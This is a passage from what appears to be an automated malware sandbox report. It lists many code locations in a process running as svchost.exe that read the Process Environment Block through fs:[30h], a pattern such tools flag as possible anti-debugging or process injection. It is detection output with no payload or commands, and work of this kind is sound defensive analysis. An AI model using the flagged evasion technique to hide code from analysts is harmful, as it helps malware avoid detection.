            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B2349 mov eax, dword ptr fs:[00000030h] 2_2_036B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov ecx, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B035C mov eax, dword ptr fs:[00000030h] 2_2_036B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036FA352 mov eax, dword ptr fs:[00000030h] 2_2_036FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D8350 mov ecx, dword ptr fs:[00000030h] 2_2_036D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370634F mov eax, dword ptr fs:[00000030h] 2_2_0370634F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov ecx, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03708324 mov eax, dword ptr fs:[00000030h] 2_2_03708324
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366A30B mov eax, dword ptr fs:[00000030h] 2_2_0366A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C310 mov ecx, dword ptr fs:[00000030h] 2_2_0362C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03650310 mov ecx, dword ptr fs:[00000030h] 2_2_03650310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036403E9 mov eax, dword ptr fs:[00000030h] 2_2_036403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E3F0 mov eax, dword ptr fs:[00000030h] 2_2_0364E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036663FF mov eax, dword ptr fs:[00000030h] 2_2_036663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EC3CD mov eax, dword ptr fs:[00000030h] 2_2_036EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A3C0 mov eax, dword ptr fs:[00000030h] 2_2_0363A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036383C0 mov eax, dword ptr fs:[00000030h] 2_2_036383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B63C0 mov eax, dword ptr fs:[00000030h] 2_2_036B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov ecx, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE3DB mov eax, dword ptr fs:[00000030h] 2_2_036DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D43D4 mov eax, dword ptr fs:[00000030h] 2_2_036D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362E388 mov eax, dword ptr fs:[00000030h] 2_2_0362E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365438F mov eax, dword ptr fs:[00000030h] 2_2_0365438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03628397 mov eax, dword ptr fs:[00000030h] 2_2_03628397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03634260 mov eax, dword ptr fs:[00000030h] 2_2_03634260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362826B mov eax, dword ptr fs:[00000030h] 2_2_0362826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036E0274 mov eax, dword ptr fs:[00000030h] 2_2_036E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B8243 mov eax, dword ptr fs:[00000030h] 2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B8243 mov ecx, dword ptr fs:[00000030h] 2_2_036B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370625D mov eax, dword ptr fs:[00000030h] 2_2_0370625D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A250 mov eax, dword ptr fs:[00000030h] 2_2_0362A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636259 mov eax, dword ptr fs:[00000030h] 2_2_03636259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EA250 mov eax, dword ptr fs:[00000030h] 2_2_036EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362823B mov eax, dword ptr fs:[00000030h] 2_2_0362823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402E1 mov eax, dword ptr fs:[00000030h] 2_2_036402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363A2C3 mov eax, dword ptr fs:[00000030h] 2_2_0363A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037062D6 mov eax, dword ptr fs:[00000030h] 2_2_037062D6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] 2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036402A0 mov eax, dword ptr fs:[00000030h] 2_2_036402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C62A0 mov ecx, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C62A0 mov eax, dword ptr fs:[00000030h] 2_2_036C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366E284 mov eax, dword ptr fs:[00000030h] 2_2_0366E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B0283 mov eax, dword ptr fs:[00000030h] 2_2_036B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] 2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03704164 mov eax, dword ptr fs:[00000030h] 2_2_03704164
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C4144 mov ecx, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C4144 mov eax, dword ptr fs:[00000030h] 2_2_036C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C156 mov eax, dword ptr fs:[00000030h] 2_2_0362C156
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C8158 mov eax, dword ptr fs:[00000030h] 2_2_036C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] 2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03636154 mov eax, dword ptr fs:[00000030h] 2_2_03636154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03660124 mov eax, dword ptr fs:[00000030h] 2_2_03660124
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov eax, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DE10E mov ecx, dword ptr fs:[00000030h] 2_2_036DE10E
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 mov ecx, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036DA118 mov eax, dword ptr fs:[00000030h] 2_2_036DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F0115 mov eax, dword ptr fs:[00000030h] 2_2_036F0115
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_037061E5 mov eax, dword ptr fs:[00000030h] 2_2_037061E5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036601F8 mov eax, dword ptr fs:[00000030h] 2_2_036601F8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h] 2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F61C3 mov eax, dword ptr fs:[00000030h] 2_2_036F61C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_036AE1D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03670185 mov eax, dword ptr fs:[00000030h] 2_2_03670185
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h] 2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036EC188 mov eax, dword ptr fs:[00000030h] 2_2_036EC188
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h] 2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D4180 mov eax, dword ptr fs:[00000030h] 2_2_036D4180
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B019F mov eax, dword ptr fs:[00000030h] 2_2_036B019F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A197 mov eax, dword ptr fs:[00000030h] 2_2_0362A197
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0365C073 mov eax, dword ptr fs:[00000030h] 2_2_0365C073
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03632050 mov eax, dword ptr fs:[00000030h] 2_2_03632050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B6050 mov eax, dword ptr fs:[00000030h] 2_2_036B6050
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A020 mov eax, dword ptr fs:[00000030h] 2_2_0362A020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C020 mov eax, dword ptr fs:[00000030h] 2_2_0362C020
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C6030 mov eax, dword ptr fs:[00000030h] 2_2_036C6030
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B4000 mov ecx, dword ptr fs:[00000030h] 2_2_036B4000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036D2000 mov eax, dword ptr fs:[00000030h] 2_2_036D2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0364E016 mov eax, dword ptr fs:[00000030h] 2_2_0364E016
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362A0E3 mov ecx, dword ptr fs:[00000030h] 2_2_0362A0E3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036380E9 mov eax, dword ptr fs:[00000030h] 2_2_036380E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B60E0 mov eax, dword ptr fs:[00000030h] 2_2_036B60E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0362C0F0 mov eax, dword ptr fs:[00000030h] 2_2_0362C0F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036720F0 mov ecx, dword ptr fs:[00000030h] 2_2_036720F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036B20DE mov eax, dword ptr fs:[00000030h] 2_2_036B20DE
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036280A0 mov eax, dword ptr fs:[00000030h] 2_2_036280A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036C80A8 mov eax, dword ptr fs:[00000030h] 2_2_036C80A8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F60B8 mov eax, dword ptr fs:[00000030h] 2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036F60B8 mov ecx, dword ptr fs:[00000030h] 2_2_036F60B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0363208A mov eax, dword ptr fs:[00000030h] 2_2_0363208A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03638770 mov eax, dword ptr fs:[00000030h] 2_2_03638770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03640770 mov eax, dword ptr fs:[00000030h] 2_2_03640770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366674D mov esi, dword ptr fs:[00000030h] 2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0366674D mov eax, dword ptr fs:[00000030h] 2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366674D mov eax, dword ptr fs:[00000030h]2_2_0366674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630750 mov eax, dword ptr fs:[00000030h]2_2_03630750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE75D mov eax, dword ptr fs:[00000030h]2_2_036BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672750 mov eax, dword ptr fs:[00000030h]2_2_03672750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B4755 mov eax, dword ptr fs:[00000030h]2_2_036B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C720 mov eax, dword ptr fs:[00000030h]2_2_0366C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov ecx, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366273C mov eax, dword ptr fs:[00000030h]2_2_0366273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AC730 mov eax, dword ptr fs:[00000030h]2_2_036AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366C700 mov eax, dword ptr fs:[00000030h]2_2_0366C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03630710 mov eax, dword ptr fs:[00000030h]2_2_03630710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660710 mov eax, dword ptr fs:[00000030h]2_2_03660710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036527ED mov eax, dword ptr fs:[00000030h]2_2_036527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BE7E1 mov eax, dword ptr fs:[00000030h]2_2_036BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036347FB mov eax, dword ptr fs:[00000030h]2_2_036347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363C7C0 mov eax, dword ptr fs:[00000030h]2_2_0363C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036B07C3 mov eax, dword ptr fs:[00000030h]2_2_036B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307AF mov eax, dword ptr fs:[00000030h]2_2_036307AF
